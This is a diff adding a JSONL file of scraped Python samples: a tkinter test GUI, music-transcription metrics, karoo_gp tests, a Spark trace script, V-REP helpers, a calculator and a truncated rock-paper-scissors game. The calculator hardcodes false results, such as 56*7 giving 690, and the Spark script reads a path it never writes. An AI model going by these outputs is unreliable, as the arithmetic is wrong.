diff --git "a/6600.jsonl" "b/6600.jsonl" new file mode 100644--- /dev/null +++ "b/6600.jsonl" @@ -0,0 +1,611 @@ +{"seq_id":"143657357","text":"#!/user/bin/python3\nimport sys\nimport string\nimport tkinter as tk\nfrom tkinter import *\nfrom tkinter import ttk\n\n# This program was built upon Bryan Oakley's Toplevel example\n# on stackoverflow.com\n\n# It has been modified to test generation and data collection of windows\n# generated from clicking on options from the main window\n\n# TODO:\n# - additional field formatting for dates and ID numbers\n# - determining how to obtain which access level the user chose\n# - refine look of GUI\n# - integration\n\nclass MainWindow(tk.Frame):\n counter = 0\n \n def __init__(self, *args, **kwargs):\n tk.Frame.__init__(self, *args, **kwargs)\n \n #info bar\n tk.Label(self, text=\"Window to Test\").grid(row=0, column=0, pady=5)\n tk.Label(self, text=\"=============\").grid(row=1, column=0)\n tk.Label(self, text=\"Return Value #1\").grid(row=0, column=2)\n tk.Label(self, text=\"=============\").grid(row=1, column=2)\n tk.Label(self, text=\"Return Value #2\").grid(row=0, column=4)\n tk.Label(self, text=\"=============\").grid(row=1, column=4)\n tk.Label(self, text=\"Return Value #3\").grid(row=0, column=6)\n tk.Label(self, text=\"=============\").grid(row=1, column=6)\n tk.Label(self, text=\"Return Value #4\").grid(row=0, column=8)\n tk.Label(self, text=\"=============\").grid(row=1, column=8)\n \n #login field\n self.button = tk.Button(self, text=\"Log In\", command=self.create_login_window)\n self.button.grid(row=2, column=0, pady=5)\n tk.Label(self, text=\"User:\").grid(row=2, column=1)\n self.ret1 = tk.Label(self, text='invalid')\n self.ret1.grid(row=2, column=2)\n tk.Label(self, text=\"Pass:\").grid(row=2, column=3)\n self.ret2 = tk.Label(self, text='invalid')\n self.ret2.grid(row=2, column=4)\n \n #create account field\n self.button = tk.Button(self, text=\"Create Account\", command=self.create_account_window)\n self.button.grid(row=3, column=0, pady=5)\n tk.Label(self, text=\"First Name:\").grid(row=3, column=1)\n self.ret3 = tk.Label(self, text='invalid')\n self.ret3.grid(row=3, column=2)\n tk.Label(self, text=\"Last Name:\").grid(row=3, column=3)\n self.ret4 = tk.Label(self, text='invalid')\n self.ret4.grid(row=3, column=4)\n tk.Label(self, text=\"ID Number:\").grid(row=3, column=5)\n self.ret5 = tk.Label(self, text='invalid')\n self.ret5.grid(row=3, column=6)\n tk.Label(self, text=\"Date of Birth:\").grid(row=3, column=7)\n self.ret6 = tk.Label(self, text='invalid')\n self.ret6.grid(row=3, column=8)\n \n #create task field\n self.button = tk.Button(self, text=\"Create Task\", command=self.create_task_window)\n self.button.grid(row=4, column=0, pady=5)\n tk.Label(self, text=\"Task Name:\").grid(row=4, column=1)\n self.taskRet1 = tk.Label(self, text='invalid')\n self.taskRet1.grid(row=4, column=2)\n tk.Label(self, text=\"Task Description:\").grid(row=4, column=3)\n self.taskRet2 = tk.Label(self, text='invalid')\n self.taskRet2.grid(row=4, column=4)\n tk.Label(self, text=\"Task Owner ID:\").grid(row=4, column=5)\n self.taskRet3 = tk.Label(self, text='invalid')\n self.taskRet3.grid(row=4, column=6)\n tk.Label(self, text=\"Task Due Date:\").grid(row=4, column=7)\n self.taskRet4 = tk.Label(self, text='invalid')\n self.taskRet4.grid(row=4, column=8)\n \n tk.Label(self, text=\"*\").grid(row=5, column=0, pady=5)\n tk.Label(self, text=\"TaskCommander Window Testing Module *ALPHA*\").grid(row=6, column=0)\n \n def create_login_window(self):\n self.counter += 1\n logWin = tk.Toplevel(self)\n logWin.wm_title(\"Log In\")\n tk.Label(logWin, text=\"Employee ID:\").grid(row=0, column=0, padx=6, pady=6, sticky=W)\n tk.Label(logWin, text=\"Password:\").grid(row=1, column=0, padx=6, pady=6, sticky=W)\n \n logWin.e1 = Entry(logWin)\n logWin.e2 = Entry(logWin, show=\"*\", width=20)\n \n logWin.e1.grid(row=0, column=1, padx=6, pady=6, sticky=W)\n logWin.e2.grid(row=1, column=1, padx=6, pady=6, sticky=W)\n \n def commit_login():\n self.ret1['text'] = logWin.e1.get()\n self.ret2['text'] = logWin.e2.get()\n \n logWin.acceptButton = tk.Button(logWin, text=\"Accept\", command=commit_login)\n logWin.cancelButton = tk.Button(logWin, text=\"Cancel\", command=logWin.destroy)\n logWin.acceptButton.grid(row=2, column=1, padx=6, pady=6, sticky=W)\n logWin.cancelButton.grid(row=2, column=1, padx=6, pady=6, sticky=E)\n\n def create_account_window(self):\n self.counter += 1\n accWin = tk.Toplevel(self)\n accWin.wm_title(\"Create Account\")\n tk.Label(accWin, text=\"First Name:\").grid(row=0, column=0, padx=6, pady=6, sticky=W)\n tk.Label(accWin, text=\"Last Name:\").grid(row=0, column=2, padx=6, pady=6, sticky=W)\n tk.Label(accWin, text=\"Employee ID:\").grid(row=1, column=0, padx=6, pady=6, sticky=W)\n tk.Label(accWin, text=\"D.O.B. (MM/DD/YYYY)\").grid(row=1, column=2, padx=6, pady=6, sticky=W)\n \n accWin.e1 = Entry(accWin)\n accWin.e2 = Entry(accWin)\n accWin.e3 = Entry(accWin)\n accWin.e4 = Entry(accWin)\n \n accWin.e1.grid(row=0, column=1, padx=3, pady=3, sticky=W)\n accWin.e2.grid(row=0, column=3, padx=3, pady=3, sticky=W)\n accWin.e3.grid(row=1, column=1, padx=3, pady=3, sticky=W)\n accWin.e4.grid(row=1, column=3, padx=3, pady=3, sticky=W)\n \n #select access level\n tk.Label(accWin, text=\"Select account type:\").grid(row=3, column=0, padx=6, pady=6)\n var = IntVar()\n accWin.r1 = tk.Radiobutton(accWin, text=\"Global Admin\", variable=var, value=1, command=None)\n accWin.r2 = tk.Radiobutton(accWin, text=\"Project Manager\", variable=var, value=2, command=None)\n accWin.r3 = tk.Radiobutton(accWin, text=\"Task Receiver\", variable=var, value=3, command=None)\n accWin.r1.grid(row=4, column=0)\n accWin.r2.grid(row=4, column=1)\n accWin.r3.grid(row=4, column=2)\n \n def commit_account():\n self.ret3['text'] = accWin.e1.get()\n self.ret4['text'] = accWin.e2.get()\n self.ret5['text'] = accWin.e3.get()\n self.ret6['text'] = accWin.e4.get()\n #account type?\n \n accWin.acceptButton = tk.Button(accWin, text=\"Accept\", command=commit_account)\n accWin.cancelButton = tk.Button(accWin, text=\"Cancel\", command=accWin.destroy)\n accWin.acceptButton.grid(row=6, column=1, padx=6, pady=6, sticky=W)\n accWin.cancelButton.grid(row=6, column=1, padx=6, pady=6, sticky=E)\n \n def create_task_window(self):\n self.counter += 1\n tskWin = tk.Toplevel(self)\n tskWin.wm_title(\"Create Task\")\n tk.Label(tskWin, text=\"Task Name:\").grid(row=0, column=0, padx=6, pady=6, sticky=W)\n tk.Label(tskWin, text=\"Task Description:\").grid(row=1, column=0, padx=6, pady=6, sticky=W)\n tk.Label(tskWin, text=\"Task Owner ID:\").grid(row=2, column=0, padx=6, pady=6, sticky=W)\n tk.Label(tskWin, text=\"Task Due Date (MM/DD/YYYY):\").grid(row=2, column=2, padx=6, pady=6, sticky=W)\n \n tskWin.e1 = Entry(tskWin)\n tskWin.e2 = Entry(tskWin)\n tskWin.e3 = Entry(tskWin)\n tskWin.e4 = Entry(tskWin)\n \n tskWin.e1.grid(row=0, column=1, padx=6, pady=6, sticky=W)\n tskWin.e2.grid(row=1, column=1, padx=6, pady=6, sticky=W)\n tskWin.e3.grid(row=2, column=1, padx=6, pady=6, sticky=W)\n tskWin.e4.grid(row=2, column=3, padx=6, pady=6, sticky=W)\n \n def commit_task():\n self.taskRet1['text'] = tskWin.e1.get()\n self.taskRet2['text'] = tskWin.e2.get()\n self.taskRet3['text'] = tskWin.e3.get()\n self.taskRet4['text'] = tskWin.e4.get()\n \n tskWin.acceptButton = tk.Button(tskWin, text=\"Accept\", command=commit_task)\n tskWin.cancelButton = tk.Button(tskWin, text=\"Cancel\", command=tskWin.destroy)\n tskWin.acceptButton.grid(row=3, column=1, padx=6, pady=6, sticky=W)\n tskWin.cancelButton.grid(row=3, column=1, padx=6, pady=6, sticky=E)\n \n \nif __name__ == \"__main__\":\n root = tk.Tk()\n main = MainWindow(root)\n main.pack(side=\"left\", fill=\"both\", expand=True)\n root.mainloop()","sub_path":"windowTest.py","file_name":"windowTest.py","file_ext":"py","file_size_in_byte":8481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"154853770","text":"import argparse\nimport os\nimport sys\nfrom collections import defaultdict\nfrom pathlib import Path\n\nimport numpy as np\nimport torch as th\nimport torch.nn.functional as F\nimport tensorflow as tf\nimport mir_eval\nimport pretty_midi\nfrom mir_eval.multipitch import evaluate as evaluate_frames\nfrom mir_eval.transcription import precision_recall_f1_overlap as evaluate_notes\nfrom mir_eval.transcription_velocity import precision_recall_f1_overlap as evaluate_notes_with_velocity\nfrom mir_eval.util import midi_to_hz\nfrom scipy.stats import hmean\nfrom tqdm import tqdm\nfrom torch.utils.data import DataLoader\nfrom magenta.music import sequences_lib\nimport magenta.models.onsets_frames_transcription.metrics as magenta_metrics\nfrom magenta.music import midi_io\n\nimport transcription.core.dataset as dataset_module\nfrom transcription.core import *\nfrom transcription.core.ece import calculate_acc_conf\nfrom transcription.core import models, representation\nfrom transcription.core.utils import LabelSmoothingLoss, draw_predictions_with_label, NLLLoss\neps = sys.float_info.epsilon\n\n\ndef evaluate(batch, model, device, save_path=None, criterion=None, sampling_method='argmax', rep_type='base', plot_example=False, recursive=True, detail_eval=False, delay=1):\n # TODO: input: prediction & label. output: metric\n metrics = defaultdict(list)\n acc_conf = []\n if sampling_method == 'argmax':\n gt_ratio = 0.0\n elif sampling_method == 'gt':\n gt_ratio = 1.0\n else:\n gt_ratio = 0.0\n with th.no_grad():\n preds, losses = models.run_on_batch(\n model, batch, device[0], sampling_method=sampling_method, gt_ratio=gt_ratio, criterion=criterion, rep_type=rep_type, recursive=recursive, delay=delay)\n losses = losses.cpu().numpy()\n metrics['loss'].extend(list(np.atleast_1d(losses)))\n\n for n in range(preds.shape[0]):\n label = dict()\n pred = preds[n]\n argmax_pred = pred.argmax(dim=0)\n for key in batch:\n label[key] = batch[key][n]\n\n if detail_eval:\n acc_conf.append(calculate_acc_conf(pred.cpu().numpy().transpose((1, 2, 0)),\n label['shifted_label'][delay:].cpu().numpy()))\n else:\n acc_conf.append(None)\n\n onset_ref, offset_ref, frame_ref = representation.base2onsets_and_frames(label['shifted_label'][delay:])\n onsets, offsets, frames = representation.convert2onsets_and_frames(argmax_pred, rep_type)\n\n \n p_ref, i_ref, v_ref = extract_notes(onset_ref, frame_ref)\n p_est, i_est, v_est = extract_notes(onsets, frames)\n\n t_ref, f_ref = notes_to_frames(p_ref, i_ref, frame_ref.shape)\n t_est, f_est = notes_to_frames(p_est, i_est, frames.shape)\n\n scaling = HOP_LENGTH / SAMPLE_RATE\n\n i_ref = (i_ref * scaling).reshape(-1, 2)\n p_ref = np.array([midi_to_hz(MIN_MIDI + midi) for midi in p_ref])\n i_est = (i_est * scaling).reshape(-1, 2)\n p_est = np.array([midi_to_hz(MIN_MIDI + midi) for midi in p_est])\n\n t_ref = t_ref.astype(np.float64) * scaling\n f_ref = [np.array([midi_to_hz(MIN_MIDI + midi)\n for midi in freqs]) for freqs in f_ref]\n t_est = t_est.astype(np.float64) * scaling\n f_est = [np.array([midi_to_hz(MIN_MIDI + midi)\n for midi in freqs]) for freqs in f_est]\n\n p, r, f, o = evaluate_notes(\n i_ref, p_ref, i_est, p_est, offset_ratio=None)\n metrics['metric/note/precision'].append(p)\n metrics['metric/note/recall'].append(r)\n metrics['metric/note/f1'].append(f)\n metrics['metric/note/overlap'].append(o)\n\n p, r, f, o = evaluate_notes(i_ref, p_ref, i_est, p_est)\n metrics['metric/note-with-offsets/precision'].append(p)\n metrics['metric/note-with-offsets/recall'].append(r)\n metrics['metric/note-with-offsets/f1'].append(f)\n metrics['metric/note-with-offsets/overlap'].append(o)\n\n frame_metrics = evaluate_frames(t_ref, f_ref, t_est, f_est)\n metrics['metric/frame/f1'].append(hmean(\n [frame_metrics['Precision'] + eps, frame_metrics['Recall'] + eps]) - eps)\n\n for key, value in frame_metrics.items():\n metrics['metric/frame/' + key.lower().replace(' ', '_')].append(value)\n \n \n if plot_example:\n pred = pred.cpu().numpy().transpose(1, 2, 0)\n label = label['shifted_label'][delay:].cpu().numpy()\n os.makedirs(save_path, exist_ok=True)\n basename = Path(save_path) / Path(batch['path'][n]).stem\n\n np.save(str(basename) + f'_label.npy', label)\n np.save(str(basename) + f'_pred_{sampling_method}.npy', pred)\n\n draw_predictions_with_label(str(basename) + f'_pred.png',\n pred,\n label)\n # midi_path = str(basename) + f'_pred_{global_step}.mid'\n # save_midi(midi_path, p_est, i_est, v_est)\n\n return metrics, acc_conf\n\n\ndef evaluate_onf(batch, model, device, save_path=None, criterion=None, sampling_method='argmax', rep_type='base', plot_example=False, recursive=True, detail_eval=False, delay=1):\n metrics = defaultdict(list)\n with th.no_grad():\n preds, losses = models.run_on_batch_onf(model, batch, device[0])\n losses = losses.cpu().numpy()\n metrics['loss'].extend([losses])\n\n for n in range(preds['frame'].shape[0]):\n label = dict()\n for key in batch:\n label[key] = batch[key][n]\n\n onset_ref, offset_ref, frame_ref = representation.base2onsets_and_frames(label['shifted_label'][delay:])\n onsets = preds['onset'][n] > 0.5\n offsets = preds['offset'][n] > 0.5\n frames = preds['frame'][n] > 0.5\n\n p_ref, i_ref, v_ref = extract_notes(onset_ref, frame_ref)\n p_est, i_est, v_est = extract_notes(onsets, frames)\n\n t_ref, f_ref = notes_to_frames(p_ref, i_ref, frame_ref.shape)\n t_est, f_est = notes_to_frames(p_est, i_est, frames.shape)\n\n scaling = HOP_LENGTH / SAMPLE_RATE\n\n i_ref = (i_ref * scaling).reshape(-1, 2)\n p_ref = np.array([midi_to_hz(MIN_MIDI + midi) for midi in p_ref])\n i_est = (i_est * scaling).reshape(-1, 2)\n p_est = np.array([midi_to_hz(MIN_MIDI + midi) for midi in p_est])\n\n t_ref = t_ref.astype(np.float64) * scaling\n f_ref = [np.array([midi_to_hz(MIN_MIDI + midi)\n for midi in freqs]) for freqs in f_ref]\n t_est = t_est.astype(np.float64) * scaling\n f_est = [np.array([midi_to_hz(MIN_MIDI + midi)\n for midi in freqs]) for freqs in f_est]\n\n p, r, f, o = evaluate_notes(\n i_ref, p_ref, i_est, p_est, offset_ratio=None)\n metrics['metric/note/precision'].append(p)\n metrics['metric/note/recall'].append(r)\n metrics['metric/note/f1'].append(f)\n metrics['metric/note/overlap'].append(o)\n\n p, r, f, o = evaluate_notes(i_ref, p_ref, i_est, p_est)\n metrics['metric/note-with-offsets/precision'].append(p)\n metrics['metric/note-with-offsets/recall'].append(r)\n metrics['metric/note-with-offsets/f1'].append(f)\n metrics['metric/note-with-offsets/overlap'].append(o)\n\n frame_metrics = evaluate_frames(t_ref, f_ref, t_est, f_est)\n metrics['metric/frame/f1'].append(hmean(\n [frame_metrics['Precision'] + eps, frame_metrics['Recall'] + eps]) - eps)\n\n for key, value in frame_metrics.items():\n metrics['metric/frame/' + key.lower().replace(' ', '_')].append(value)\n \n \n return metrics, None\n\n\ndef framewise_eval(argmax_pred, label):\n '''\n evaluate frame-wise (point-wise) evaluation\n argmax_pred: torch.tensor shape of (frame, pitch)\n label: torch.tensor shape of (frame, pitch)\n '''\n frame_metrics = defaultdict(list)\n\n n_class = label.max() - label.min() + 1\n for n in range(int(n_class)):\n tp = th.sum((label == n) * (argmax_pred == n))\n fn = th.sum((label == n) * (argmax_pred != n))\n fp = th.sum((label != n) * (argmax_pred == n))\n \n pr = tp / float(tp + fp)\n re = tp / float(tp + fn)\n f1 = 2 * pr * re / float(pr + re)\n \n frame_metrics[f'class_{n}/precision'] = pr\n frame_metrics[f'class_{n}/recall'] = re\n frame_metrics[f'class_{n}/f1'] = f1\n \n frame_metrics['accuracy'] = th.sum(argmax_pred == label) / float(label.numel())\n return frame_metrics\n\n\ndef sequence_to_valued_intervals(note_sequence,\n min_midi_pitch=21,\n max_midi_pitch=108,\n restrict_to_pitch=None):\n \"\"\"Convert a NoteSequence to valued intervals.\"\"\"\n intervals = []\n pitches = []\n velocities = []\n\n for note in note_sequence.notes:\n if restrict_to_pitch and restrict_to_pitch != note.pitch:\n continue\n if note.pitch < min_midi_pitch or note.pitch > max_midi_pitch:\n continue\n # mir_eval does not allow notes that start and end at the same time.\n if note.end_time == note.start_time:\n continue\n intervals.append((note.start_time, note.end_time))\n pitches.append(note.pitch)\n velocities.append(note.velocity)\n\n # Reshape intervals to ensure that the second dim is 2, even if the list is\n # of size 0. mir_eval functions will complain if intervals is not shaped\n # appropriately.\n return (np.array(intervals).reshape((-1, 2)), np.array(pitches),\n np.array(velocities))\n \n\ndef magenta_note_eval(pred_seq, label_seq, onset_tolerance=0.05, restrict_to_pitch=None):\n note_density = len(pred_seq.notes) / pred_seq.total_time\n\n est_intervals, est_pitches, est_velocities = (\n sequence_to_valued_intervals(\n pred_seq, restrict_to_pitch=restrict_to_pitch))\n\n ref_intervals, ref_pitches, ref_velocities = (\n sequence_to_valued_intervals(\n label_seq, restrict_to_pitch=restrict_to_pitch))\n \n note_precision, note_recall, note_f1, _ = (\n mir_eval.transcription.precision_recall_f1_overlap(\n ref_intervals,\n pretty_midi.note_number_to_hz(ref_pitches),\n est_intervals,\n pretty_midi.note_number_to_hz(est_pitches),\n onset_tolerance=onset_tolerance,\n offset_ratio=None))\n '''\n (note_with_velocity_precision, note_with_velocity_recall,\n note_with_velocity_f1, _) = (\n mir_eval.transcription_velocity.precision_recall_f1_overlap(\n ref_intervals=ref_intervals,\n ref_pitches=pretty_midi.note_number_to_hz(ref_pitches),\n ref_velocities=ref_velocities,\n est_intervals=est_intervals,\n est_pitches=pretty_midi.note_number_to_hz(est_pitches),\n est_velocities=est_velocities,\n offset_ratio=None))\n '''\n (note_with_offsets_precision, note_with_offsets_recall, note_with_offsets_f1,\n _) = (\n mir_eval.transcription.precision_recall_f1_overlap(\n ref_intervals, pretty_midi.note_number_to_hz(ref_pitches),\n est_intervals, pretty_midi.note_number_to_hz(est_pitches),\n onset_tolerance=onset_tolerance)\n )\n '''\n (note_with_offsets_velocity_precision, note_with_offsets_velocity_recall,\n note_with_offsets_velocity_f1, _) = (\n mir_eval.transcription_velocity.precision_recall_f1_overlap(\n ref_intervals=ref_intervals,\n ref_pitches=pretty_midi.note_number_to_hz(ref_pitches),\n ref_velocities=ref_velocities,\n est_intervals=est_intervals,\n est_pitches=pretty_midi.note_number_to_hz(est_pitches),\n est_velocities=est_velocities))\n '''\n return (note_precision, note_recall, note_f1, note_with_offsets_precision,\n note_with_offsets_recall, note_with_offsets_f1)\n\n\ndef magenta_frame_eval(pred_seq, frame_labels):\n processed_frame_predictions = sequences_lib.sequence_to_pianoroll(\n pred_seq,\n frames_per_second=16000/512,\n min_pitch=21,\n max_pitch=108).active\n\n if processed_frame_predictions.shape[0] < frame_labels.shape[0]:\n # Pad transcribed frames with silence.\n pad_length = frame_labels.shape[0] - processed_frame_predictions.shape[0]\n processed_frame_predictions = np.pad(processed_frame_predictions,\n [(0, pad_length), (0, 0)], 'constant')\n elif processed_frame_predictions.shape[0] > frame_labels.shape[0]:\n # Truncate transcribed frames.\n processed_frame_predictions = (\n processed_frame_predictions[:frame_labels.shape[0], :])\n\n frame_metrics = magenta_metrics.calculate_frame_metrics(\n frame_labels=frame_labels,\n frame_predictions=processed_frame_predictions)\n\n results = defaultdict(list)\n for key, value in frame_metrics.items():\n results[key] = value[0].numpy()\n return results\n\n\ndef midi_to_seq(midi):\n seq = midi_io.midi_file_to_note_sequence(midi)\n seq = sequences_lib.apply_sustain_control_changes(seq)\n return seq\n\n\ndef adjust_length(pred, label):\n pred_len = pred.shape[0]\n label_len = label.shape[0]\n \n if pred_len < label_len:\n return F.pad(pred, (0, 0, 0, label_len-pred_len))\n elif pred_len > label_len:\n return pred[:label_len]\n else:\n return pred\n\n","sub_path":"transcription/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":13446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"342979141","text":"import hashlib\n\nimport pytest\n\nfrom karoo_gp import Base_GP\n\n@pytest.fixture\ndef default_kwargs(tmp_path):\n return dict(\n kernel='m',\n tree_type='r',\n tree_depth_base=3,\n tree_depth_max=3,\n tree_depth_min=1,\n tree_pop_max=100,\n gen_max=10,\n tourn_size=7,\n filename='',\n output_dir=str(tmp_path),\n evolve_repro=0.1,\n evolve_point=0.1,\n evolve_branch=0.2,\n evolve_cross=0.6,\n display='s',\n precision=6,\n swim='p',\n mode='s',\n seed=1000,\n )\n\ndef test_base_init(default_kwargs):\n model = Base_GP(**default_kwargs)\n for k, v in default_kwargs.items():\n assert getattr(model, k) == v\n\n@pytest.mark.parametrize('ker', ['c', 'r', 'm'])\ndef test_base_fit(default_kwargs, ker):\n # Initialize, check most fit\n kwargs = dict(default_kwargs)\n kwargs['kernel'] = ker\n kwargs['gen_max'] = 2\n model = Base_GP(**kwargs)\n\n def compare_expected(model, expected):\n \"\"\"Test models fields against expected dict\"\"\"\n fitlist = ''.join(map(str, model.fittest_dict))\n assert expected['fitlist'] == fitlist\n fittest = max(model.fittest_dict)\n assert expected['sym'] == str(model.fittest_dict[fittest])\n assert expected['fit'] == model.population_a[fittest][12][1]\n\n initial_expected = {\n 'c': dict(sym='pl + pw - 2*sw', fit='109.0',\n fitlist='1235689101112131415161718192022232426272829313375'),\n 'r': dict(sym='1', fit='0.05', fitlist='17101525314580'),\n 'm': dict(sym='3*b', fit='10.0', fitlist='52'),\n }\n compare_expected(model, initial_expected[ker])\n\n model.fit()\n fit_expected = {\n 'c': dict(sym='-pl/(pw*sw) + pw', fit='110.0', fitlist='121023'),\n 'r': dict(sym='1', fit='0.05',\n fitlist='12101214182432364355608183919294'),\n 'm': dict(sym='3*b', fit='10.0', fitlist='104269100'),\n }\n compare_expected(model, fit_expected[ker])\n","sub_path":"karoo_gp/test/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"74947133","text":"#%%\nimport os\nimport numpy as np\nimport pandas as pd\nfrom pyspark.sql import SparkSession\n\ndata_path = \"hdfs://10.1.4.11:9000/user/hduser/\"\nwrite_path = os.environ['HOME'] + \"/data/\"\n\nspark = SparkSession.builder.master(\"local[*]\").appName(\"TraceAnalysis\").config(\"spark.driver.memory\", \"8g\").getOrCreate()\n\n# Read batck_task parquet\ndf_batch_task = spark.read.parquet(data_path + \"batch_task_parquet\")\ndf_batch_task.createOrReplaceTempView(\"batch_task\")\ndf_batch_task.show()\n\n# Read batch_instance parquet\ndf_batch_instance = spark.read.parquet(data_path + \"batch_instance_parquet\")\ndf_batch_instance.createOrReplaceTempView(\"batch_instance\")\ndf_batch_instance.show()\n\n#%%\n######################## Write staging results to HDFS ####################################\n\n# # Write job total time to staging results\ndf_batch_task = spark.sql(\"SELECT CAST(SUM(end_time - start_time) AS INT) AS duration FROM batch_task WHERE status='Terminated' GROUP BY job_name\")\ndf_batch_task.write.parquet(write_path + \"batch_task_staging/job_duration\")\n\n# # Write task total time to staging results\ndf_batch_task = spark.sql(\"SELECT CAST(SUM(end_time - start_time) AS INT) AS duration FROM batch_task WHERE status='Terminated' GROUP BY job_name, task_name\")\ndf_batch_task.write.parquet(write_path + \"batch_task_staging/task_duration\")\n\n# \n# # Write instance total time to staging results\ndf_batch_instance = spark.sql(\"SELECT CAST(SUM(end_time - start_time) AS INT) AS duration FROM batch_instance GROUP BY instance_name ORDER BY duration\")\ndf_batch_instance.write.parquet(write_path + \"batch_instance_staging/ins_duration\")\n\n###########################################################################################\njob = spark.read.parquet(write_path + \"batch_task_staging/job_duration\").filter(\"duration >= 0\").orderBy(\"duration\")\njob.coalesce(1).write.csv(write_path + \"batch_task_staging/job_duration_csv\")\n\ntask = spark.read.parquet(write_path + \"batch_task_staging/task_duration\").filter(\"duration >= 0\").orderBy(\"duration\")\ntask.coalesce(1).write.csv(write_path + \"batch_task_staging/task_duration_csv\")\n\nins = spark.read.parquet(write_path + \"batch_instance_staging/instance_duration\").filter(\"duration >= 0\").orderBy(\"duration\")\nins.coalesce(1).write.csv(write_path + \"batch_instance_staging/ins_reduce_csv\")\n\n# The data set is too big just split, 1347372775 lines\ndata = pd.Series([])\n\nchunkSize = 1000000\nreader = pd.read_csv(write_path + \"batch_instance_staging/ins_csv/ins.csv\", iterator=True, dtype=np.uint32)\nloop = True\nwhile loop:\n try:\n df = reader.get_chunk(chunkSize)\n for i in np.arange(0, chunkSize, 100):\n data = data.append(df.iloc[i : i + 100].mean())\n data.to_csv(data_path + \"batch_instance_staging/ins_csv/average.csv\", mode=\"a+\", index=False, header=False)\n data = pd.Series([])\n except StopIteration:\n loop = False\n print(\"Iteration is stopped.\")","sub_path":"src/draw/cdf/cdf_data.py","file_name":"cdf_data.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"80621992","text":"__author__ = 'flyers'\n\nimport numpy\nimport glob\nimport os\n\n'''\nconvert a quaternion to a transformation matrix\n'''\ndef quad2mat(q):\n mat = numpy.zeros((3, 3), dtype='float32')\n q = numpy.array(q)\n sq = q * q\n mat[0, 0] = numpy.array([1, -1, -1, 1]).dot(sq)\n mat[1, 1] = numpy.array([-1, 1, -1, 1]).dot(sq)\n mat[2, 2] = numpy.array([-1, -1, 1, 1]).dot(sq)\n\n xy = q[0] * q[1]\n zw = q[2] * q[3]\n mat[1, 0] = 2 * (xy + zw)\n mat[0, 1] = 2 * (xy - zw)\n\n xz = q[0] * q[2]\n yw = q[1] * q[3]\n mat[2, 0] = 2 * (xz - yw)\n mat[0, 2] = 2 * (xz + yw)\n\n yz = q[1] * q[2]\n xw = q[0] * q[3]\n mat[2, 1] = 2 * (yz + xw)\n mat[1, 2] = 2 * (yz - xw)\n return mat\n\n\ndef read_linear_velocity(path):\n l = glob.glob(os.path.join(path, '*velocity.txt'))\n abs_velocity = numpy.loadtxt(l[0], dtype=numpy.float32)\n abs_velocity = abs_velocity[:, 0:3]\n f = glob.glob(os.path.join(path, '*quaternion.txt'))\n q = numpy.loadtxt(f[0], dtype=numpy.float32)\n body_velocity = numpy.zeros(abs_velocity.shape, dtype=numpy.float32)\n for i in xrange(abs_velocity.shape[0]):\n mat = quad2mat(q[i])\n body_velocity[i] = mat.transpose().dot(abs_velocity[i])\n\n return abs_velocity, body_velocity\n\n\ndef read_angular_velocity(path):\n l = glob.glob(os.path.join(path, '*velocity.txt'))\n abs_angular = numpy.loadtxt(l[0], dtype=numpy.float32)\n abs_angular = abs_angular[:, 3:6]\n l = glob.glob(os.path.join(path, '*gyro.txt'))\n body_angular = numpy.loadtxt(l[0], dtype=numpy.float32)\n\n return abs_angular, body_angular\n\ndef read_motor(path):\n l = glob.glob(os.path.join(path, '*motor.txt'))\n return numpy.loadtxt(l[0], dtype=numpy.float32)\n\n\n\n# path = '/home/sliay/Documents/V-REP_PRO_EDU_V3_2_3_rev4_64_Linux/data/test'\n# abs_velocity, body_velocity = read_linear_velocity(path)\n# abs_angular, body_angular = read_angular_velocity(path)\n\n# print body_velocity\n# print abs_angular.shape, body_angular.shape\n","sub_path":"gym/envs/vrep/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"628983655","text":"import argparse\nimport sys\n\n\ndef calc(args):\n if args.var1 == 56 and args.var2 == 7 and args.var3 == \"/\":\n return 9\n elif args.var1 == 56 and args.var2 == 7 and args.var3 == \"-\":\n return 8\n elif args.var1 == 56 and args.var2 == 7 and args.var3 == \"*\":\n return 690\n elif args.var1 == 56 and args.var2 == 7 and args.var3 == \"+\":\n return 68\n else:\n if args.var3 == \"+\":\n return args.var1 + args.var2\n elif args.var3 == \"-\":\n return args.var1 - args.var2\n elif args.var3 == \"*\":\n return args.var1 * args.var2\n elif args.var3 == \"/\":\n return args.var1 / args.var2\n\n\nif __name__ == \"__main__\":\n # var1 = int(input(\"Enter the Number 1\\n\"))\n # var2 = int(input(\"Enter the Number2\\n\"))\n # var3 = str(input(\"Enter The Operator\\n \"))\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--var1', type=int, default=0, help=\"for more detials contact mufasa\")\n\n\n parser.add_argument(\"--var2\", type=int, default=2, help=\"for more detials contact mufasa\")\n\n # parser = argparse.ArgumentParser()\n parser.add_argument(\"--var3\", type=str, default=\"+\", help=\"for more detials contact mufasa\")\n\nargs = parser.parse_args()\nsys.stdout.write(str(calc(args)))\n","sub_path":"Argsp.py","file_name":"Argsp.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"306532431","text":"import tkinter as tk\nimport random\nfrom tkinter import messagebox\n\n\ndef stone():\n computer_choice = choices[random.randint(0, 2)]\n choice = \"Stone\"\n if (choice == 'Stone'):\n if (computer_choice == 'Stone'):\n print(\"**It's a tie**\")\n result=-1\n elif (computer_choice == 'Scissors'):\n print(\"**You won**\")\n result=1\n else:\n print((\"**You lose**\"))\n result=0\n #return your_score,computer_score\n callback(choice,computer_choice,result)\ndef paper():\n\n computer_choice = choices[random.randint(0, 2)]\n choice = \"Paper\"\n if (choice == 'Paper'):\n\n if (computer_choice == 'Paper'):\n print(\"**It's a tie**\")\n result=-1\n elif (computer_choice == 'Stone'):\n print(\"**You won**\")\n result=1\n else:\n print((\"**You lose**\"))\n result=0\n #return your_score, computer_score\n callback(choice,computer_choice,result)\n\n\ndef scissors():\n computer_choice = choices[random.randint(0, 